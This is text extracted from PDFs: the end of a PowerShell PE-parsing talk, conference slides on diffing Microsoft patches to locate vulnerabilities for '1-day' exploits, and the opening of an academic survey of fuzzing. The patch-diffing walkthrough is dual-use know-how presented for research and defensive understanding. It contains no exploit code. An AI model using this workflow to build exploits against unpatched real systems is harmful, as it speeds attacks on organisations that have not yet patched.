MATTHEW GRAEBER -CREATIVE COMMONS ATTRIBUTION 3.0 
UNPORTED LICENSE.20
MATTHEW GRAEBER -CREATIVE COMMONS ATTRIBUTION 3.0 
UNPORTED LICENSE.21The DOS header parser is complete. Now what?
Let analyze every the DOS header of every PE in Windows!
With analysis complete, we can find commonality across DOS headers and form the 
basis for what a ‘normal’ DOS header should look like.
Conclusion
Parsing binary file formats in PowerShell is not a trivial matter . 
However, once structure is applied to a binary blob and is stored in an 
object, this is where PowerShell really shines.
There are three primary strategies for parsing binary data in 
PowerShell: pure PowerShell, C# compilation, and reflection. Each 
strategy has their respective pros and cons.
Parsing binary data in PowerShell requires knowledge of C -style 
structure definitions and data types.
MATTHEW GRAEBER -CREATIVE COMMONS ATTRIBUTION 3.0 
UNPORTED LICENSE.22
Thanks!
Twitter: @mattifestation
Blog: www.exploit -monday.com
Github : PowerSploit
MATTHEW GRAEBER -CREATIVE COMMONS ATTRIBUTION 3.0 
UNPORTED LICENSE.23
Bonus: Rich Signature (1/2)
Located between the DOS header and the NT header (i.e. PE header)
An XOR encoded blob produced by Microsoft compilers and describes information 
about the linker used to link external dependencies.
Not documented by Microsoft. Daniel Pistelli gives a throuough description here: 
http:// ntcore.com/files/richsign.htm
Completely useless part of a binary aside from being semi -useful in malware 
analysis.
MATTHEW GRAEBER -CREATIVE COMMONS ATTRIBUTION 3.0 
UNPORTED LICENSE.24

Bonus: Rich Signature (2/2)
After XOR decoding, the Rich signature is comprised of the following:
A Rich signature ‘signature’ –‘DanS ’
Legend has it, ‘
 DanS ’ is named after Dan Ruder -
http://web.archive.org/web/20111219190947/http:// mirror.sweon.net/madchat/vxdevl/vxmag
s/29a -8/Articles/29A -8.009
An array or three fields containing linker information:
Build Number
Product Identifier
Link Count
The word ‘Rich’ to indicate the presence of a Rich signature
The DWORD XOR used to decode the signature
Let’s extend our DOS header parser to parse the Rich signature...
MATTHEW GRAEBER -CREATIVE COMMONS ATTRIBUTION 3.0 
UNPORTED LICENSE.25Microsoft Patch Analysis for 
Exploitation
Stephen Sims
1

OS Market Share
2•Windows 7 clearly 
dominant
•XP still at 7.4%
•ATM Machines
•Embedded systems
•Windows 10 quickly 
gaining traction
•Mac OS and Linux still a 
small number in 
comparisonTaken on April 29th, 2017 from 
https://www.netmarketshare.com/operating -system -
market -share.aspx?qprid=10&qpcustomd=0

Application and OS Patching
•Maintaining a handle on the patching of a large number of 
systems and applications is complex
•The more users who have Administrative access to their 
workstations, the more likely there are going to be unique 
applications installed
•Many of which are likely not approved
•Some companies grant all users Administrative access to their computers
•Some vendors make patching easy, such as Microsoft, and others 
have no process at all
•Solutions like application whitelisting can be performed, but is 
hard when scaling in medium to large organizations
Microsoft Patch T uesday
•Microsoft releases patches on the second Tuesday of each month, 
for now..., and only sometimes (No Feb, 2017 Patches...)
•An effort to help simplify the patching process
•Random patch releases caused many users to miss patches
•However, waiting up to 30 days for the next patch has security concerns
•Emergency patches are released out -of-cycle
•Exploits sometimes released in the days following
•“One -Day Exploits”
•Some vendors will buy exploits for patched privately disclosed 
vulnerabilities
Windows as a Service ( WaaS )
•Windows has always had various versions (Professional , Home, 
Enterprise, Ultimate), service packs, monthly updates, etc... 
•Microsoft desires to have all systems in the same known state
•This allows them to perform QA testing on systems in the same state as the 
customers receiving updates
•Monthly cumulative updates supersede the prior month’s update and 
includes all features and fixes
•Feature updates are deployed multiple times per year
•Quality updates, including security patches, are sent in monthly cumulative packages 
•Windows 10, Windows 10 Mobile, and Windows 10 IOT Mobile 
all fall under WaaS
5
T ypical Patched System in an Enterprise vs. Microsoft Lab
6
https://docs.microsoft.com/en -us/windows/deployment/update/waas -overview
WaaS Servicing Branches
•Three servicing branches are available to allow organizations to 
choose when devices are updated
•Current Branch (CB) –Feature updates are immediately available to 
systems set not to defer updates
•Good for developers and other groups to test for compatibility issues
•Current Branch for Business (CBB) –Updates deferred for about four 
months while vetted by business partners and customers
•After about four months the CB build is assumed
•Quality updates can only be deferred for 30 days using Windows Update for Business, 
but up to 12 months with WSUS
•Long -Term Servicing Branch (LTSB) –Updates deferred for an average of 
2-3 years as devices are specialized, such as cash machines, medical, and 
automotive 
7
Patch Distribution
•Windows Update
•Automatic Updates, available in the Control Panel
•Vista, 7, 8,10 and Server 2008/2012/2016
•Automatic Updates has expanded functionality
•Windows Server Update Service (WSUS)
•Enterprise patch management solution
•Control over patch distribution
•Windows Update for Business (WUB) for Windows 10
•Third -party Patch Management Solutions
Reverse Engineering Updates
•It is important to know that good guys, bad guys, and those in -
between often reverse engineer security updates
•Exploitation frameworks such as Metasploit, Core Impact, SAINT Exploit, 
and Immunity Canvas want to be able to offer their customers exploits that 
are not available by their competitors
•Attackers want to quickly discover the patched vulnerability and attempt to 
develop a working exploit before most organizations patch 
•The above is often referred to as a “1 -day exploit” since there is a race 
condition between the time a patch is released and the time systems are 
patched
•Reversing patches is an acquired skill and is not limited to 
Microsoft updates
9
https://technet.microsoft.com/en -us/security/bulletins.aspxObtaining Patches for Analysis Up Until April, 2017
Knowledge Base Number
April, 2017’s Update Changes Format Again...
•You must now go to: https://portal.msrc.microsoft.com/en -
us/security -guidance
•More difficult to navigate
•You can still download
the cumulative update
from here
•You can get the actual 
vulnerability information 
here:
•https://portal.msrc.microsoft.com/en -us/security -guidance/summary
11

T ypes of Patches
•Patches for XP and Windows 2000, and 2003 server had 
.exe extensions, and still do for extended embedded XP 
support
•For example, WindowsXP -KB979559 -x86-ENU.exe
•Patches for Vista, 7, 8, 10, and Server 2008/2012/2016 
have . msu extensions 
•For example, Windows6.0 -KB979559 -x86.msu
•Extraction methods differ slightly, as to the contents of each 
package
Extraction T ool for .msu Patches
Update File•expand –F:* <. msu file> < dest >
c:\derp \MS16 -106\Patched> expand -F:* Windows6.1 -KB3185911 -x86.msu .
Microsoft (R) File Expansion Utility  Version 6.1.7600.16385
Copyright (c) Microsoft Corporation. All rights reserved.
Adding . \WSUSSCAN.cab to Extraction Queue
Adding . \Windows6.1 -KB3185911 -x86.cab to Extraction Queue
Adding . \Windows6.1 -KB3185911 -x86-pkgProperties.txt to Extraction Queue
Adding . \Windows6.1 -KB3185911 -x86.xml to Extraction Queue
Expanding Files ....
Expanding Files Complete ...
4 files total.
c:\derp \MS16 -106\Patched> expand -F:* Windows6.1 -KB3185911 -x86.cab .
#Output truncated for space...
c:\derp \MS16 -106\Patched> dir /s /b / o:n /ad
c:\derp \MS16 -106\Patched \x86_microsoft -windows -user32 _31bf3856ad364e35_6.1.7601.
23528_none_cfc274bde4c0ef6f
c:\derp \MS16 -106\Patched \x86_microsoft -windows -win32k _31bf3856ad364e35_6.1.7601.
23528_none_bb7d823711eb39fdCabinet File Contents
We can see that one directory contains a patch to 
user32.dll and the other win32k.sys•We are interested in .cab files
c:\derp \MS16 -106\Patched> cd x86_microsoft -windows -user32_31bf3856ad364e35_6.1.76
01.23528_none_cfc274bde4c0ef6f
c:\derp \MS16 -106\Patched \x86_microsoft -windows -user32_31bf3856ad364e35_6.1.7601.
23528_none_cfc274bde4c0ef6f> dir
Volume in drive C has no label.
Volume Serial Number is CEF2 -482A
Directory of c: \derp \MS16 -106\Patched \x86_microsoft -windows -user32_31bf3856ad36
4e35_6.1.7601.23528_none_cfc274bde4c0ef6f
01/31/2017  12:57 PM    <DIR>          .
01/31/2017  12:57 PM    <DIR>          ..
08/15/2016  06:48 PM           811,520 user32.dll
1 File(s)        811,520 bytes
2 Dir(s)  161,884,778,496 bytes freeThe Patched File
Patched File•Examining folder contents
Extracting Cumulative Updates
•As mentioned previously, patches are now cumulative and 
contain all updates for the OS version
•This *can* make for very large update files that contain hundreds of files
•Mapping an extracted file to the right Knowledge Base (KB) number is 
difficult
•Greg Linares (@Laughing_Mantis ) wrote some PowerShell 
scripts to help with this problem
•The concept is quite simple, using the modified data on the updates to 
identify files that have changed within the last 30 days
•They are then placed into unique directories and cleanup is performed
•You still need to determine which file correlates to which advisory, but the 
process is much easier
16
Obtaining a Cumulative Update for Windows 10
•The following screenshot shows the cumulative update file for 
April, 2017
17Very large files...but, Window 7’s update is just around 100mb

PatchExtract
•Now that we have the updated downloaded, let’s extract it with 
PatchExtract13 from Greg Linares
•The above command looks quite long, but much of that is due to the long 
.msu filename
•This command took ~10  minutes to complete on the 500MB file
•It extracted every folder and file from the cumulative update and 
resulted in an enormous number of folders
•When randomly looking at a couple of the modified dates on 
some patched files, many dated all the way back to 2015
18c:\Patches \MS17 -JAN \x86> Powershell -ExecutionPolicy Bypass -File c: \Patches \Patc
hExtract13.ps1 -Patch windows10.0 -kb3210720 -x86_04faf73b558f6796b73c2fff1442561
22f4e36a9.msu -Path c: \Patches \MS17 -JAN
PatchClean
•We will now clean up the enormous output and list only the files 
changed within the past 30 days
•As you can see, PatchClean has identified 16 folders whose 
contents have changed within the last 30 days
•This saves us a TON of time!
19c:\Patches \MS17 -JAN \x86> Powershell -ExecutionPolicy Bypass -File c: \Patches \Patc
hClean.ps1 -Path c: \Patches \MS17 -JAN \x86 \
#Lots of output that has been truncated for space...
==========================================================
Low Priority Folders: 1020
Low Priority Files: 3810
High Priority Folders: 16
PatchExtract / PatchClean Demonstration
•Extracting the April, 2017 Update
20

Patch Extraction Results
21

Mapping a Patched File to the Security Advisory
•MS17 -001 says: 
22
c:\Patches \MS17 -JAN \x86> cd ie -htmlrendering_11.0.10240.17236
c:\Patches \MS17 -JAN \x86\ie-htmlrendering_11.0.10240.17236> dir
Volume in drive C has no label.
Volume Serial Number is 6681 -3E06
Directory of c: \Patches \MS17 -JAN \x86\ie-htmlrendering_11.0.10240.17236
01/10/2017  05:01 PM    <DIR>          .
01/10/2017  05:01 PM    <DIR>          ..
12/21/2016  12:00 AM        18,796,032 edgehtml.dll
1 File(s)     18,796,032 bytes
2 Dir(s)  45,532,430,336 bytes free
Patch Diffing
•Security patches are often made to applications, DLLs, driver 
files, and shared objects
•When a new version is released, it can be difficult to locate what 
changes were made
•Some are new features or general application changes
•Some are security fixes
•Some changes are intentional to thwart reversing
•Some vendors make it clear as to reasoning for the update to the 
binary
•Binary diffing tools can help you locate the changes
Binary Diffing T ools
•The following is a list of well -known binary diffing tools:
•Zynamics /Google’s BinDiff : Free as of March 18, 2016!
•Core Security’s turbodiff :Free 
•DarunGrim 4 by Jeongwook Oh: Free 
•patchdiff2 by Nicolas Pouvesle : Free 
•Diaphora by Joxean Koret
•There are more
Example of BinDiff Results
25

Example of a Patched Vulnerability –MS16 -009
26
Unpatched
Patched

MS16 -009 Demonstration
27

MS17 -010
•Critical SMB vulnerabilities disclosed
•Patch Tuesday in February delayed until March
28

MS17 -010 BinDiff Demo
29

An oldie but goodie...
•If we have time, a quick demo of an older and simple, but very 
clear vulnerability in MS07 -017...
30

Thanks!
Stephen Sims
@Steph3nSims
stephen@deadlisting.com
The recorded presentation is available at: 
https://www.youtube.com/watch?v=LHNcBVQF1tM
http://www.irongeek.com/i.php?page=videos/bsidescharm2017/bs
idescharm -2017 -t111-microsoft -patch -analysis -for-exploitation -
stephen -sims
31arXiv:1812.00140v4  [cs.CR]  8 Apr 20191
The Art, Science, and Engineering of Fuzzing:
A Survey
Valentin J.M. Man `es, HyungSeok Han, Choongwoo Han, Sang Kil Cha, Manuel Egele ,
Edward J. Schwartz, and Maverick Woo
Abstract —Among the many software vulnerability discovery techniqu es available today, fuzzing has remained highly popular due to its
conceptual simplicity, its low barrier to deployment, and i ts vast amount of empirical evidence in discovering real-wo rld software
vulnerabilities. At a high level, fuzzing refers to a proces s of repeatedly running a program with generated inputs that may be
syntactically or semantically malformed. While researche rs and practitioners alike have invested a large and diverse effort towards
improving fuzzing in recent years, this surge of work has als o made it difficult to gain a comprehensive and coherent view o f fuzzing. To
help preserve and bring coherence to the vast literature of f uzzing, this paper presents a unified, general-purpose mode l of fuzzing
together with a taxonomy of the current fuzzing literature. We methodically explore the design decisions at every stage of our model
fuzzer by surveying the related literature and innovations in the art, science, and engineering that make modern-day fu zzers effective.
Index Terms —software security, automated software testing, fuzzing.
✦
1 I NTRODUCTION
Ever since its introduction in the early 1990s [152], fuzzing
has remained one of the most widely-deployed techniques
to discover software security vulnerabilities. At a high le vel,
fuzzing refers to a process of repeatedly running a program
with generated inputs that may be syntactically or seman-
tically malformed. In practice, attackers routinely deplo y
fuzzing in scenarios such as exploit generation and pene-
tration testing [21], [109]; several teams in the 2016 DARPA
Cyber Grand Challenge (CGC) also employed fuzzing in
their cyber reasoning systems [37], [200], [9], [93]. Fuele d by
these activities, defenders have started to use fuzzing in a n
attempt to discover vulnerabilities before attackers do. F or
example, prominent vendors such as Adobe [1], Cisco [2],
Google [61], [5], [15], and Microsoft [38], [8] all employ
fuzzing as part of their secure development practices. More
recently, security auditors [237] and open-source develop -
ers [4] have also started to use fuzzing to gauge the security
of commodity software packages and provide some suitable
forms of assurance to end-users.
The fuzzing community is extremely vibrant. As of this
writing, GitHub alone hosts over a thousand public reposi-
tories related to fuzzing [86]. And as we will demonstrate,
the literature also contains a large number of fuzzers (see
•V . J. M. Man` es is with KAIST Cyber Security Research Center, Korea
E-mail: valentin.manes@kaist.ac.kr.
•H. Han and S. K. Cha are with KAIST, Korea
E-mail: hyungseok.han@kaist.ac.kr and sangkilc@kaist.a c.kr.
•C. Han is with Naver Corp., Korea
E-mail: cwhan.tunz@navercorp.com.
•M. Egele is with Boston University
E-mail: megele@bu.edu.
•E. J. Schwartz is with SEI, Carnegie Mellon University
E-mail: edmcman@cmu.edu
•M. Woo is with Carnegie Mellon University
E-mail: pooh@cmu.edu.
Corresponding author: Sang Kil Cha.
Manuscript submitted on April 8, 2019.Figure 1 on p. 5) and an increasing number of fuzzing
studies appear at major security conferences (e.g. [225],
[52], [37], [176], [83], [239]). In addition, the blogosphe re is
filled with many success stories of fuzzing, some of which
also contain what we consider to be gems that warrant a
permanent place in the literature.
Unfortunately, this surge of work in fuzzing by re-
searchers and practitioners alike also bears a warning sign
of impeded progress. For example, the description of some
fuzzers do not go much beyond their source code and
manual page. As such, it is easy to lose track of the de-
sign decisions and potentially important tweaks in these
fuzzers over time. Furthermore, there has been an observ-
able fragmentation in the terminology used by various
fuzzers. For example, whereas AFL [231] uses the term “test
case minimization” to refer to a technique that reduces the
size of a crashing input, the same technique is called “test
case reduction” in funfuzz [187]. At the same time, while
BFF [49] includes a similar-sounding technique called “cra sh
minimization”, this technique actually seeks to minimize
the number of bits that differ between the crashing input
and the original seed file and is not related to reducing
input size. This makes it difficult, if not impossible, to
compare fuzzers using the published evaluation results. We
believe such fragmentation makes it difficult to discover
and disseminate fuzzing knowledge and this may severely
hinder the progress in fuzzing research in the long run.
Due to the above reasons, we believe it is prime time
to consolidate and distill the large amount of progress in
fuzzing, many of which happened after the three trade-
books on the subject were published in 2007–2008 [79], [203] ,
[205].
As we attempt to unify the field, we will start by us-
ing§2 to present our fuzzing terminology and a unified
model of fuzzing. Staying true to the purpose of this paper,
our terminology is chosen to closely reflect the current
predominant usages, and our model fuzzer (Algorithm 1,
2
p. 3) is designed to suit a large number of fuzzing tasks
as classified in a taxonomy of the current fuzzing literature
(Figure 1, p. 5). With this setup, we will then explore every
stage of our model fuzzer in §3–§7, and present a detailed
overview of major fuzzers in Table 1 (p. 6). At each stage,
we will survey the relevant literature to explain the design
choices, discuss important trade-offs, and highlight many
marvelous engineering efforts that help make modern-day
fuzzers effective at their task.
2 S YSTEMIZATION , TAXONOMY ,AND TEST PRO-
GRAMS
The term “fuzz” was originally coined by Miller et al . in
1990 to refer to a program that “generates a stream of ran-
dom characters to be consumed by a target program” [152,
p. 4]. Since then, the concept of fuzz as well as its action—
“fuzzing”—has appeared in a wide variety of contexts, in-
cluding dynamic symbolic execution [90], [226], grammar-
based test case generation [88], [105], [213], permission t est-
ing [24], [80], behavioral testing [122], [175], [224], com plex-
ity testing [135], [222], kernel testing [216], [196], [186 ], repre-
sentation dependence testing [121], function detection [2 27],
robustness evaluation [223], exploit development [111], G UI
testing [197], signature generation [72], and penetration
testing [81], [156]. To systematizethe knowledge from the
vast literature of fuzzing, let us first present a terminolog y
of fuzzing extracted from modern uses.
2.1 Fuzzing & Fuzz Testing
Intuitively, fuzzing is the action of running a Program Unde r
Test (PUT) with “fuzz inputs”. Honoring Miller et al., we
consider a fuzz input to be an input that the PUT may not be
expecting, i.e., an input that the PUT may process incorrect ly
and trigger a behavior that was unintended by the PUT
developer. To capture this idea, we define the term fuzzing
as follows.
Definition 1 (Fuzzing ).Fuzzing is the execution of the PUT
using input(s) sampled from an input space (the “fuzz input
space”) that protrudes the expected input space of the PUT.
Three remarks are in order. First, although it may be
common to see the fuzz input space to contain the expected
input space, this is notnecessary—it suffices for the former
to contain an input not in the latter. Second, in practice
fuzzing almost surely runs for many iterations; thus writing
“repeated executions” above would still be largely accurat e.
Third, the sampling process is notnecessarily randomized,
as we will see in §5.
Fuzz testing is a form of software testing technique that
utilizes fuzzing. To differentiate it from others and to hon or
what we consider to be its most prominent purpose, we
deem it to have a specific goal of finding security-related
bugs, which include program crashes. In addition, we also
define fuzzer and fuzz campaign , both of which are common
terms in fuzz testing:
Definition 2 (Fuzz Testing ).Fuzz testing is the use of fuzzing
to test if a PUT violates a security policy.
Definition 3 (Fuzzer ).A fuzzer is a program that performs
fuzz testing on a PUT.Definition 4 (Fuzz Campaign ).A fuzz campaign is a specific
execution of a fuzzer on a PUT with a specific security
policy.
The goal of running a PUT through a fuzzing campaign
is to find bugs [26] that violate the specified security policy .
For example, a security policy employed by early fuzzers
tested only whether a generated input—the test case —
crashed the PUT. However, fuzz testing can actually be used
to test any security policy observable from an execution, i. e.,
EM-enforceable [183]. The specific mechanism that decides
whether an execution violates the security policy is called
thebug oracle .
Definition 5 (Bug Oracle ).A bug oracle is a program, per-
haps as part of a fuzzer, that determines whether a given
execution of the PUT violates a specific security policy.
We refer to the algorithm implemented by a fuzzer
simply as its “fuzz algorithm”. Almost all fuzz algorithms
depend on some parameters beyond (the path to) the PUT.
Each concrete setting of the parameters is a fuzz configura-
tion:
Definition 6 (Fuzz Configuration ).A fuzz configuration of
a fuzz algorithm comprises the parameter value(s) that
control(s) the fuzz algorithm.
The definition of a fuzz configuration is intended to be
broad. Note that the type of values in a fuzz configuration
depend on the type of the fuzz algorithm. For example, a
fuzz algorithm that sends streams of random bytes to the
PUT [152] has a simple configuration space {(PUT)}. On
the other hand, sophisticated fuzzers contain algorithms
that accept a set of configurations and evolve the set over
time—this includes adding and removing configurations.
For example, CERT BFF [49] varies both the mutation ratio
and the seed over the course of a campaign, and thus its
configuration space is {(PUT,s1,r1),(PUT,s2,r2),...}. A
seed is a (commonly well-structured) input to the PUT, used
to generate test cases by modifying it. Fuzzers typically
maintain a collection of seeds, and some fuzzers evolve the
collection as the fuzz campaign progresses. This collectio n is
called a seed pool . Finally, a fuzzer is able to store some data
within each configuration. For instance, coverage-guided
fuzzers may store the attained coverage in each configura-
tion.
2.2 Paper Selection Criteria
To achieve a well-defined scope, we have chosen to include
all publications on fuzzing in the last proceedings of 4 ma-
jor security conferences and 3 major software engineering
conferences from Jan 2008 to February 2019. Alphabetically ,
the former includes (i) ACM Conference on Computer and
Communications Security (CCS), (ii) IEEE Symposium on
Security and Privacy (S&P), (iii) Network and Distributed
System Security Symposium (NDSS), and (iv) USENIX Se-
curity Symposium (USEC); and the latter includes (i) ACM
International Symposium on the Foundations of Software
Engineering (FSE), (ii) IEEE/ACM International Conferenc e
on Automated Software Engineering (ASE), and (iii) Interna -
tional Conference on Software Engineering (ICSE). For writ -
3
ALGORITHM 1: Fuzz Testing
Input: C,tlimit
Output: B// a finite set of bugs
1B←∅
2C←PREPROCESS (C)
3whiletelapsed< tlimit∧CONTINUE(C)do
4conf←SCHEDULE(C,telapsed ,tlimit)
5tcs←INPUTGEN(conf)
//Obugis embedded in a fuzzer
6B′,execinfos←INPUTEVAL(conf ,tcs,Obug)
7C←CONFUPDATE(C,conf ,execinfos )
8B←B∪B′
9return B
ings that appear in other venues or mediums, we include
them based on our own judgment on their relevance.
As mentioned in §2.1, fuzz testing only differentiates
itself from software testing in that fuzz testing is securit y
related. In theory, focusing on security bugs does not imply
a difference in the testing process beyond the selection of
a bug oracle. The techniques used often vary in practice,
however. When designing a testing tool, access to source
code and some knowledge about the PUT are often assumed.
Such assumptions often drive the development of testing
tools to have different characteristics compared to those o f
fuzzers, which are more likely to be employed by parties
other than the PUT’s developer. Nevertheless, the two fields
are still closely related to one another. Therefore, when we
are unsure whether to classify a publication as relating to
“fuzz testing” and include it in this survey, we follow a
simple rule of thumb: we include the publication if the word
fuzz appears in it.
2.3 Fuzz Testing Algorithm
We present a generic algorithm for fuzz testing, Algorithm 1 ,
which we imagine to have been implemented in a model
fuzzer . It is general enough to accommodate existing fuzzing
techniques, including black-, grey-, and white-box fuzzin g
as defined in §2.4. Algorithm 1 takes a set of fuzz configu-
rationsCand a timeout tlimitas input, and outputs a set of
discovered bugs B. It consists of two parts. The first part is
thePREPROCESS function, which is executed at the begin-
ning of a fuzz campaign. The second part is a series of five
functions inside a loop: SCHEDULE ,INPUTGEN,INPUTEVAL,
CONFUPDATE , andCONTINUE . Each execution of this loop
is called a fuzz iteration and each time INPUTEVAL executes
the PUT on a test case is called a fuzz run . Note that some
fuzzers do notimplement all five functions. For example, to
model Radamsa [102], which never updates the set of fuzz
configurations, CONFUPDATE always returns the current set
of configurations unchanged.
PREPROCESS (C)→C
A user supplies PREPROCESS with a set of fuzz config-
urations as input, and it returns a potentially-modified
set of fuzz configurations. Depending on the fuzz algo-
rithm,PREPROCESS may perform a variety of actions
such as inserting instrumentation code to PUTs, or
measuring the execution speed of seed files. See §3.
SCHEDULE (C,telapsed ,tlimit)→conf
SCHEDULE takes in the current set of fuzz configura-tions, the current time telapsed , and a timeout tlimit as
input, and selects a fuzz configuration to be used for
the current fuzz iteration. See §4.
INPUTGEN(conf )→tcs
INPUTGENtakes a fuzz configuration as input and
returns a set of concrete test cases tcs as output.
When generating test cases, INPUTGENuses specific
parameter(s) in conf . Some fuzzers use a seed in conf
for generating test cases, while others use a model or
grammar as a parameter. See §5.
INPUTEVAL (conf ,tcs,Obug)→B′,execinfos
INPUTEVAL takes a fuzz configuration conf , a set of
test cases tcs, and a bug oracle Obugas input. It
executes the PUT on tcs and checks if the executions
violate the security policy using the bug oracle Obug. It
then outputs the set of bugs found B′and information
about each of the fuzz runs execinfos , which may
be used to update the fuzz configurations. We assume
Obugis embedded in our model fuzzer. See §6.
CONFUPDATE (C,conf ,execinfos )→C
CONFUPDATE takes a set of fuzz configurations C, the
current configuration conf , and the information about
each of the fuzz runs execinfos , as input. It may
update the set of fuzz configurations C. For example,
many grey-box fuzzers reduce the number of fuzz
configurations in Cbased onexecinfos . See§7.
CONTINUE (C)→ {True,False}
CONTINUE takes a set of fuzz configurations Cas input
and outputs a boolean indicating whether a new fuzz
iteration should occur. This function is useful to model
white-box fuzzers that can terminate when there are no
more paths to discover.
2.4 Taxonomy of Fuzzers
For this paper, we have categorized fuzzers into three
groups based on the granularity of semantics a fuzzer ob-
serves in each fuzz run. These three groups are called black- ,
grey-, and white-box fuzzers, which we define below. Note
that this classification is different from traditional soft ware
testing, where there are only two major categories (black-
and white-box testing) [158]. As we will discuss in §2.4.3,
grey-box fuzzing is a variant of white-box fuzzing that can
only obtain some partial information from each fuzz run.
2.4.1 Black-box Fuzzer
The term “black-box” is commonly used in software test-
ing [158], [32] and fuzzing to denote techniques that do
not see the internals of the PUT—these techniques can
observe only the input/output behavior of the PUT, treating
it as a black-box. In software testing, black-box testing is
also called IO-driven or data-driven testing [158]. Most
traditional fuzzers [13], [103], [49], [6], [50] are in this
category. Some modern fuzzers, e.g., funfuzz [187] and
Peach [76], also take the structural information about inpu ts
into account to generate more meaningful test cases while
maintaining the characteristic of not inspecting the PUT. A
similar intuition is used in adaptive random testing [57].
2.4.2 White-box Fuzzer
At the other extreme of the spectrum, white-box fuzzing [90]
generates test cases by analyzing the internals of the PUT
4
and the information gathered when executing the PUT.
Thus, white-box fuzzers are able to explore the state space
of the PUT systematically. The term white-box fuzzing was
introduced by Godefroid [87] in 2007 and refers to dynamic
symbolic execution (DSE), which is a variant of symbolic
execution [39], [126], [108]. In DSE, symbolic and concrete ex-
ecution operate concurrently, where concrete program stat es
are used to simplify symbolic constraints, e.g., concretiz ing
system calls. DSE is thus often referred to as concolic testing
(concrete + symbolic) [191], [89]. In addition, white-box
fuzzing has also been used to describe fuzzers that employ
taint analysis [84]. The overhead of white-box fuzzing is
typically much higher than that of black-box fuzzing. This
is partly because DSE implementations [90], [46], [25] ofte n
employ dynamic instrumentation and SMT solving [155].
While DSE is an active research area [90], [88], [38], [172],
[112], many DSEs are notwhite-box fuzzers because they
do not aim to find security bugs. As such, this paper does
not provide a comprehensive survey on DSEs and we refer
the reader to recent survey papers [17], [185] for more
information on DSEs for non-security applications.
2.4.3 Grey-box Fuzzer
Some fuzzers [78], [68], [205] take a middle ground ap-
proach which is dubbed grey-box fuzzing . In general, grey-
box fuzzers can obtain some information internal to the
PUT and/or its executions. Unlike white-box fuzzers, grey-
box fuzzers do not reason about the full semantics of the
PUT; instead, they may perform lightweight static analysis
on the PUT and/or gather dynamic information about its
executions, such as code coverage. Grey-box fuzzers rely on
approximated, imperfect information in order to gain speed
and be able to test more inputs. Although there usually is a
consensus between security experts, the distinction betwe en
black-, grey- and white-box fuzzing is not always clear.
Black-box fuzzers may collect some information about fuzz
runs, and white-box fuzzers often use some approximations.
When classifying the fuzzers in this survey, particularly i n
Table 1, we used our best judgement.
An early example of grey-box fuzzer is EFS [68], which
uses code coverage gathered from each fuzz run to generate
test cases with an evolutionary algorithm. Randoop [166]
also used a similar approach, though it did not target
security vulnerabilities. Modern fuzzers such as AFL [231]
and VUzzer [176] are exemplars in this category.
2.5 Fuzzer Genealogy and Overview
Figure 1 (p. 5) presents our categorization of existing fuzz ers
in chronological order. Starting from the seminal work by
Miller et al. [152], we manually chose popular fuzzers that
either appeared in a major conference or obtained more than
100 GitHub stars, and showed their relationships as a graph.
Black-box fuzzers are in the left half of the figure, and grey-
and white-box fuzzers are in the right half. Furthermore,
fuzzers are subdivided depending on the type of input the
PUT uses: file, network, UI, web, kernel I/O, or threads (in
the case of concurrency fuzzers).
Table 1 (p. 6) presents a detailed summary of the tech-
niques used in the most notable fuzzers in Figure 1. We
had to omit some of fuzzers in Figure 1 due to spaceconstraints. Each fuzzer is summarized based on its imple-
mentation of the five functions of our model fuzzer, and
a miscellaneous section that provides other details on the
fuzzer. We describe the properties described by each column
below. The first column (feedback gathering granularity)
indicates whether the fuzzer is black- ( /CIRCLE), white- (/Circle), or
grey-box (/RIGHTCIRCLE /Circle). Two circles appear when a fuzzer has two
phases which use different kinds of feedback gathering.
For example, SymFuzz [52] runs a white-box analysis as a
preprocessing step in order to optimize the performance of a
subsequent black-box campaign ( /CIRCLE+/Circle), and hybrid fuzzers,
such as Driller [200], alternate between white- and grey-
box fuzzing (/RIGHTCIRCLE /Circle+/Circle). The second column shows whether the
source code of the fuzzer is publicly available. The third
column denotes whether fuzzers need the source code of
the PUT to operate. The fourth column points out whether
fuzzers support in-memory fuzzing (see §3.1.2). The fifth col-
umn is about whether fuzzers can infer models (see §5.1.2).
The sixth column shows whether fuzzers perform either
static or dynamic analysis in PREPROCESS . The seventh
column indicates if fuzzers support handling multiple seed s,
and perform scheduling. The mutation column specifies if
fuzzers perform input mutation to generate test cases. We
use/RIGHTCIRCLE /Circleto indicate fuzzers that guide input mutation based
on the execution feedback. The model-based column is
about whether fuzzers generate test cases based on a model.
The constraint-based column shows that fuzzers perform a
symbolic analysis to generate test cases. The taint analysi s
column means that fuzzers leverage taint analysis to guide
their test case generation process. The two columns in the
INPUTEVAL section show whether fuzzers perform crash
triage using either stack hashing or code coverage. The
first column of the CONFUPDATE section indicates if fuzzers
evolve the seed pool during CONFUPDATE , such as adding
new seeds to the pool (see §7.1). The second column of
theCONFUPDATE section is about whether fuzzers learn an
input model in an online fashion. Finally, the third column
of theCONFUPDATE section shows which fuzzers remove
seeds from the seed pool (see §7.2).
3 P REPROCESS
Some fuzzers modify the initial set of fuzz configurations
before the first fuzz iteration. Such preprocessing is com-
monly used to instrument the PUT, to weed out potentially-
redundant configurations (i.e., “seed selection” [177]), t o
trim seeds, and to generate driver applications. As will be
detailed in §5.1.1 (p. 9), PREPROCESS can also be used to
prepare a model for future input generation ( INPUTGEN).
3.1 Instrumentation
Unlike black-box fuzzers, both grey- and white-box fuzzers
can instrument the PUT to gather execution feedback as
INPUTEVAL performs fuzz runs (see §6), or to fuzz the
memory contents at runtime. The amount of collected in-
formation defines the color of a fuzzer (i.e., black-, white- ,
or grey-box). Although there are other ways of acquiring
information about the internals of the PUT (e.g., processor
traces or system call usage [204], [92]), instrumentation i s
often the method that collects the most valuable feedback.
5
Black-box Grey-box White-boxNetwork File KernelWeb
File Kernel ConcurrencyConcurency
KernelMiller et al.ὖE[152]
PROTOS ὖE[120]
SPIKE [13]
SNOOZE ὖE[29]
KiFὖE[12]
LZFuzzὖE[40]
KameleonFuzz ὖE[74]
T-FuzzὖE[114]
PULSAR ὖE[85]
tlsfuzzer [124]
llfuzzer [198]
Ruiter et al.ὖE[180]
TLS-Attacker ὖE[195]
DELTAὖE[134]Sharefuzz [14]
zzuf [103]
FileFuzz [201]SPIKEfile [202]
jsfunfuzz [187]
DOMfuzz [187]
reffuzz [234]Fuzzbox [207]
MiniFuzz [151]
BFF [49]
cross fuzz [232]
LangFuzz ὖE[105]
Nduja [212]
BlendFuzz ὖE[229]
FOE [50]Householder ὖE[107], [106]
Woo et al.ὖE[225]
Rebert et al.ὖE[177]
Melkor [95]
Dewey et al.ὖE[69], [70]
SymFuzz ὖE[52]
